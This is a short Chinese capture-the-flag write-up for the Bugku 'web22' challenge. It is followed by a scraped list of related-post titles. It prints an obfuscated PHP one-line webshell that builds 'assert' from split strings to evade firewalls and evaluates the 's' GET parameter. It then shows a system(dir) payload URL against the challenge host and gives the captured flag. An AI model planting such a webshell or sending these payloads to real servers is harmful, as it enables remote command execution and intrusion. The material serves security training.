0、打开网页,查看题目描述

送给大家一个过狗一句话:

$poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])

这句话有什么含义呢,实际上就是代码审计

我们发现GET方法接受了一个变量s,而且也没有什么过滤,因此考虑直接读取文件目录

1、构造并上传payload:http://114.67.246.176:15828/?s=system(dir)

发现了有关flag的txt文件

2、访问txt文件,http://114.67.246.176:15828/flaga15808abee46a1d5.txt

3、得到flag:flag{c188d67996aeed3558646fe4b5061132}

Bugku CTF web22(Web)相关推荐

  1. Bugku CTF 杂项(21-29) Writeup

    Bugku CTF 杂项(21-29) Writeup 0x21图穷匕见 下载得到一个图片,用winhex打开发现jpg文件尾FF D8后面有大量16进制数据,复制后面的数据,用notepad++中插 ...

  2. Bugku CTF 杂项(13-20) Writeup

    Bugku CTF 杂项(13-20) Writeup 0x13这么多数据包 用wireshark打开,浏览一下从第104个包开始有TCP协议,那么就是从第104个包开始就是攻击机(192.168.1 ...

  3. 快速配置Windows 2003平台下实现 IIS(WEB)站点的安全(SSL加密技术!)

    [实验名称] 快速配置Windows 2003平台下实现 IIS(WEB)站点的安全(SSL加密技术!) [实验基本概念] A. 对于公用信息--------------------www.Sohu. ...

  4. 维护SAP帮助信息(WEB)

    维护SAP帮助信息(WEB) 1.首先进入000 Client ,然后scc4修改000的模式 2.spro 3. 4. 5.注意 服务器为:http://help.sap.com 路径为:saphe ...

  5. 蓝桥杯模拟赛第二场(web)

    文章目录 蓝桥杯模拟赛第二场(web) 1 卡片化标签页 2 随机数生成器 3 个人博客 4 学生成绩统计 5 水果摆盘 6 给页面化个妆 7 小兔子爬楼梯 8 时间管理大师 9 购物车 10 菜单树 ...

  6. Java(web)项目安全漏洞及解决方式【面试+工作】

    Java(web)项目安全漏洞及解决方式[面试+工作] 一.安全性问题层次关系 大家经常会听到看到很多很多有关安全性方面的信息,可以说形形色色,对于在网络安全方面不太专业的同志来说,有点眼花缭乱,理不 ...

  7. 杭电CTF 密码学(1)

    杭电CTF 密码学(1) 1.拿到 BAABAABBAAAAAAAABABBABABBBAABABAABBABBBAABBABAABAA 显而易见的培根密码,直接拿去翻译. 传说,丘比龙是丘比特的弟弟 ...

  8. 使用easyexcel进行excel的导入和导出(web)

    使用easyexcel进行excel的导入和导出(web) 前言:使用springboot,mybatis,excel3.x.x,通用mapper.本文主要演示怎么使用easyexcel,因此先展示效 ...

  9. 前端(Web)是什么?做什么工作?包括什么技术?

    前端(Web)是什么? Web即全球广域网,也称为万维网,是一种基于超文本和HTTP的.全球性的.动态交互的.跨平台的分布式图形信息系统.是建立在Internet上的一种网络服务,为浏览者在Inter ...

  10. 四化智造MES(WEB)与金蝶云星空对接集成业务订单列表查询连通生产入库单新增(生产入库确认退货-生产退库单-TEST)

    接通系统:四化智造MES(WEB) MES系统是集成生产管理.品质管理.设备管理.BI数据中心.库存管理.工时管理.数据采集.看板管理等为一体的综合性生产管理系统.通过强调制造过程的透明化,帮助企业由 ...

最新文章

  1. 20190703 关于如何驱动
  2. C语言ftell()函数(返回文件当前位置)(返回给定流 stream 的当前文件位置)
  3. 初次使用Shiro进行加密密码的算法实例
  4. 解决网络请求的依赖关系
  5. Zookeeper 的 ZAB 协议
  6. 找出数组中不重复的一个数
  7. Java Web 高性能开发,第 1 部分: 前端的高性能
  8. acer软件保护卡怎么解除_Acer软件保护卡下载
  9. 神经网络求解NS方程
  10. 小米miui开发版系统获取root权限的方法
  11. 抖音怎么知道自己上热门 手机视频md5值修改
  12. 让前辈再次激励我不断进步
  13. Java用最少代码实现五子棋-玩家对战模式-人机对战模式-电脑策略对战
  14. Macbook启动台图标顺序混乱
  15. 职称计算机考试时的输入法,2017年高级职称计算机预习:输入法的使用
  16. [Spark进阶]-- Spark Dataframe操作
  17. iOS企业证书的申请教程
  18. 【数据结构+算法】浙传OJ Contest 2290:13信息1 Java 6 问题 F: Hexagon Game
  19. mc9s08dz60添加BootLoader实现CANboot下载更新功能
  20. 批处理系统、分时系统和实时系统各有什么特点?你能简单的分析下各操作系统采用了哪些设计思路来实现这些特点呢?

热门文章

  1. MySQL InnoDB 锁
  2. EM算法 --入门级详解
  3. TYPEC-CC逻辑芯片-E-MARK数据线-浅析
  4. 2段代码实现在所有浏览器下显示特殊字体(附字体转换工具)
  5. 【转载】树莓派 Raspberry Pi Pico windows7 串口驱动
  6. 高速公路收费标准c语言,c语言课程设计报告-高速公路收费系统
  7. 【Android自动化测试】Robot Framework+adb框架(四)——L2层关键字
  8. tp5 php 使用array_column函数方法 记录集数组取值(取得某个元素的值)
  9. 13-4Happy Mid-Autumn Festival
  10. 如何在微信小程序中使用iconfont 1